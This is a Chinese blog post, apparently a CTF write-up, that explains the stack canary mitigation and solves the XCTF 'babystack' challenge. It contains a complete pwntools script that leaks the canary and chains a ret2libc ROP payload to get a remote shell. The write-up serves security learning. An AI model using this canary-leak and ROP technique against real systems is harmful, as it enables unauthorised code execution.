Canary保护

最新推荐文章于 2024-01-27 21:55:15 发布
最新推荐文章于 2024-01-27 21:55:15 发布
阅读量1.1k 收藏 5
点赞数 1
文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014377094/article/details/124409452
版权

之前做题没做过canary类型,今天补知识盲点遇到canary,恰好也写一篇吧。

学pwn时基本会遇到几种保护类型,如RELRO,PIE,NX,还有Canary,这里解释一下canary。

栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将cookie信息给覆盖掉,导致栈保护检查失败而阻止shellcode的执行。在Linux中我们将cookie信息称为canary。

一大段子很烦,看图:32位情况下栈图,左边是正常的,右边是开了canary保护的情况。

进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。

来道例题看看如何破解,常见一种方法就是puts出canary,我们得到他之后在原来的栈溢出上再加个canary就可以绕过了。

看一下攻防世界进阶区的pwn1。

打开checksec,开的很全,除了pie开全乎了。

打开ida

逻辑很简单,自己打开读一下就行了。

主要看一下真实的canary长啥样 。

这是main函数

 

f5下显示是
v6 = __readfsqword(0x28u);
汇编下
 mov     rax, fs:28h
 mov     [rbp+var_8], rax

再看一下main结束时发生什么

 

 看一下jz判断哪里,如果不相等就挑一个 stack check fail的函数

这下算是彻底清晰了

fs:xx中。FS寄存器指向当前活动线程的TEB结构(线程结构)

理论上来说,对于我们就是随机的,所以我们像绕过去栈溢出,一般是老老实实把canary得到。

canary还有一个特点,第一个字符为’\x00’,目的就是为了截断防止泄露出来canary。我们可以将其’\x00’覆盖为一个非零的值。这样就可以打印出canary了。该题利用的就是这一思路。

得到canary后的操作还是ret2libc的常规操作

exp如下:

from pwn import *
from LibcSearcher import *
p = remote('111.200.241.244',59735)
elf = ELF("./babystack")
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x0000000000400908
pop_rdi = 0x0000000000400a93

p.sendlineafter('>> ','1')
payload = b'a' * (0x90 - 8) 
p.sendline(payload)  # 等价于p.send('a' * 0x88 + '\n')
p.sendlineafter('>> ','2')
p.recvuntil('aaaa\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
payload1 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('>> ',b'1')
p.send(payload1)
p.sendlineafter('>> ',b'3')
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
log.success("puts_addr +: " + hex(puts_addr)
)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh = libc_base + libc.dump('str_bin_sh')
p.sendlineafter('>> ','1')
payload2 = b'a' * (0x90 - 8) + p64(canary) + b'a' * 8 + p64(pop_rdi) + p64(binsh) + p64(system)
p.send(payload2)
p.sendlineafter('>> ','3')
p.interactive()

其中注释那个等价我再带一嘴,read函数在读取时类似gets,会把空格也算入,除此以外还会把最后的换行符算入,也就是\n。(小声嘀咕:(第一次分清换行符和回车符,那个u64是咋算开头的空字符的,知识盲区了属于是)

Marx_ICB
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
Canary保护机制
ATOD
10-25 4137
实验要求:调研 VC .net 或 GCC 4.*中的 Canary 技术实现, 弄懂原理并设计相应的实验例程进行测试,编制相应 报告。 实验环境: Windows 10, 编译器配置为 TDM-GCC 4.8.1 64-BIT Debug 实验主题: 调研 GCC 4.*中的 Canary 技术: 原理: 1、 在所有函数调用发生时,向栈帧内压入一个额外的随机 DWORD,这个随机数被称作 “c...
把小黄鸟HttpCanary证书装成系统证书(需要配合面具)
08-05
在安卓7.0以上系统把Android 小黄鸟HttpCanary证书装成系统证书 对应软件不信任第三方证书,这大概是最一劳永逸的方法了,你不是只信任系统证书,不信任用户证书吗?那我就把自定义证书装成系统证书。 解锁手机 ...
Canary机制及绕过策略-格式化字符串漏洞泄露Canary
02-24
Canary主要用于防护栈溢出攻击。我们知道,在32位系统上,对于栈溢出漏洞,攻击者通常是通过溢出栈缓冲区,覆盖栈上保存的函数返回地址来达到劫持程序执行流的目的。Stackcanary保护机制在刚进入函数时,在栈上放置一个标志canary,然后在函数结束时,判断该标志是否被改变,如果被改变,则表示有攻击行为发生。一,实验源码文件名:Canary.c命令:gcc-m32-ggdb-zexecstack-fstack-protector-no-pie-opwnmeCannary.c使用lddpwnme,查看libc文件的加载位置是否会变如果会改变,为了调试方便,可以使用:echo0>/proc/s
CTF权威指南 笔记 -第四章Linux安全机制-4.1-Stack Canaries
m0_64180167的博客
05-15 618
canaries可以分为3类具体实现是栈溢出许多都是由于字符串操作不正当 (strcpy)所产生的字符串的结尾一般都是NULL \X00 结尾 换个角度就是容易被 00截断这里就是把低位设置为 \x00 既可以防止被泄露 又可以防止被伪造截断字符还包括 CR(0X0d) LF(0x0a) EOF(0xff)防止canaries 被攻击者猜到 random canaries 通常在程序初始化的时候生成随机数 并且保存在相对安全的位置当然 如果攻击者知道他的位置 还是有可能被读取。
pwn题绕过canary保护机制新手版
educat0r的博客
03-27 2836
介绍 通俗来说,canary保护是为了防止程序能够被溢出的地方不让溢出 比如一个输入函数能够输入100个字节的内容,但是它的变量只有50个字节的大小,因为这个程序是可以接受你输入超过50个字节大小的内容的。我们就可以先输入50个字节的无用数据,然后再输入一串你想跳转到的地址把后面的return函数存在的原本的地址覆盖了,,这样程序执行完这个输入函数就会跳转到你输入的那个地址去。 而canary则是...
Linux 内核安全增强—— stack canary
weixin_71478434的博客
08-30 1433
per-cpu 变量的引入是为了实现per-task的stack canary, 每个cpu上同时只能运行一个进程/线程, per cpu变量可以随进程的切换而切换,故通过一个per-cpu变量完全可以为每个进程/线程解引用到不同的canary地址(后续称为per-cpu canary),以实现per-task的canary.默认stack canary使用全局符号(变量) __stack_chk_guard 作为原始的canary(后续称为全局canary), 在gcc/clang中均使用相同的名字...
[PWN][基础篇]什么是Canary保护
网络安全知识分享
03-20 4638
什么是Canarygdb指令复习 有无Canary呢就是在函数压栈的时候,函数刚开始执行的时候,它会多一个参数,也就是在ebp的上面,会压入一个Canary的值,在子函数验证完之后,对比Canary的值,看看是否相等。不相等,代表程序被修改,产生了异常。 本次实验教学代码如下: 实验目的,对比有无Canary保护的程序有何不同 gcc -m32 -no-pie -fno-stack-protector -o canary canary.c -m32 32位程序 -no-pie 中间没有空格 -fn
Canary保护机制及绕过
二狗的博客
01-29 773
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
版本详解:canary、dev、stable、beta
qq_45486909的博客
08-13 6882
Canary(金丝雀): 命名金丝雀,意味着“版本金贵且易碎”,这意味着该版本会融入很多新功能或者说是需要不断的更新,注入新血液,所以该版本一般都是比较频繁更新。 Dev(Develop):开发版,进一步测试稳定。 Beta(测试):测试版 stable(稳定版):稳定版 ...
Canary、Pie保护
2301_79880752的博客
01-27 790
Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中获取一个值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置。
版本详解:Beta、Dev、Canary、Stable、Chromium等版本
热门推荐
TK - Kung
03-21 4万+
以Edge浏览器为例,各个版本有着不同的区别,或者说各个版本是测试版: 以Edge浏览器来说: Canary(金丝雀)版本浏览器,命名金丝雀,以为着“版本金贵且易碎”,这意味着该版本会融入很多新功能或者说是需要不断的更新,注入新血液,所以该版本一般都是比较频繁跟新,也是工程师们大展手脚的版本。 Dev(Develop)版本浏览器,开发版,进一步测试稳定,以周更来修复,也是工程师们的王国,如果开...
Canary-crx插件
03-15
保护互联网免受虐待和操纵行为 互联网的最大问题之一是存在如此多的缺陷,但却无处可诉。 考虑一下现在报告这些痛点的过程是如何工作的。 如果您对应用程序,网站,垃圾邮件等有疑问,该去哪里? 您要向警察投诉吗?...
linux程序的常用保护机制
weixin_42072280的博客
12-11 2717
linux NX PIE windows DEP ASLR NX:-z execstack/-z noexecstack(关闭 / 开启) Canary:-fno-stack-protector/-fstack-protector/-fstack-protector-all(关闭 / 开启 / 全开启) P...
缓冲区溢出的保护机制
nibiru_holmes的博客
03-10 8729
本文转载自:http://yunnigu.dropsec.xyz/2016/10/08/checksec及其包含的保护机制/ checksec及其包含的保护机制 今天在研究liunx下栈溢出的时候发现自己对各种保护机制并不是特别了解,因此就这方面的知识在网上查找了一些资料并总结了一些心得和大家分享。 操作系统提供了许多安全机制来尝试降低或阻止缓冲区溢出攻击带来的安
Linux pwn入门教程(9)——stack canary与绕过的思路
子曰小玖的博客
06-04 2537
https://bbs.ichunqiu.com/thread-44069-1-1.html 0x00 canary简介 我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金...
ctf(pwn) canary保护机制讲解 与 解密方法介绍
半岛铁盒的博客
03-03 2073
Canary保护机制 canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 在函数开始时就随机产生一个值,将这个值CANARY放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖掉CANARY的值;当程序结束时,程序会检查CANARY这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻
canary(栈溢出保护)纯新手入门(一)
qq_66690477的博客
05-08 1637
栈溢出保护是一种缓冲区溢出攻击的缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址让shellcode能够执行。 1.基础介绍 缓冲区:在计算机读取数据时, 在内存中开辟的临时存储数据的区域。 缓冲区溢出:针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁中断之际获取程序乃至系统的控制权。 计算机对接收的输入数据没有进行有效的检测(理想的情况是程序检查数据长度并不允许输入超过缓冲区长度的字符),向缓冲区内填充数据
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 7899
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
node-v0.8.10-sunos-x64.tar.gz
最新发布
05-16
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
用C语言实现linux系统的canary保护机制
05-05
canary保护机制是一种防止缓冲区溢出攻击的机制。在函数调用时,canary值会被放置在栈的尾部,在函数返回时再次检查canary值,如果发现canary值被改变,就会触发栈溢出异常。 下面是用C语言实现canary保护机制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值